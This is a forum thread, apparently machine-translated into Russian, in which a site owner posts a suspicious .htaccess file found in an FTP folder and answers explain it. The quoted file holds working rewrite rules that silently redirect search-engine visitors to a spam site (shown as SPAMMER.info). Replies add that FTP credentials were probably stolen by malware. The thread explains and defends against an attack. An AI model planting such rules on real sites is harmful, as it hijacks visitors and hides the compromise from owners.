Назад | Перейти на главную страницу

Подозрительный файл .htaccess

Это было загружено в одну из моих FTP-папок. Я не знаком с Apache, но мне все еще интересно - может ли кто-нибудь мне сказать, какой подлый поступок пытается совершить этот файл? Спасибо!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

Это отправляет пользователей, пришедших с поисковой системы, на последний сайт SPAMMER.info (см. историю вопросов для актуальный сайт).

Ищет рефереров в попытке спрятаться от ты, поскольку вы, скорее всего, не зайдете на сайт через поисковые системы. То есть, если вы перейдете по URL напрямую, все будет нормально. Однако, если вы заходите через поисковую систему, вас перенаправляют.

Примечание: это не влияют на поисковые роботы, поскольку они (googlebot, по крайней мере) не устанавливайте заголовок реферера.

Каждый раз, когда пользователь из поисковой системы просматривает любую страницу вашего сайта, он будет перенаправлен на сайт со спамом .info.

Это очень хитро - вы не заметите, что что-то не так, поскольку обычно вы просто вводите адрес.

чтобы добавить больше - скорее всего, произошла утечка ваших учетных данных ftp. возможно, вы сохранили их в filezilla / total commander и т. д. существует множество вредоносных программ, которые крадут их, а затем «обходят» их - вход в учетные записи ftp, прикрепление вредоносного javascript к index.php / html или размещение аналогичных файлов перезаписи.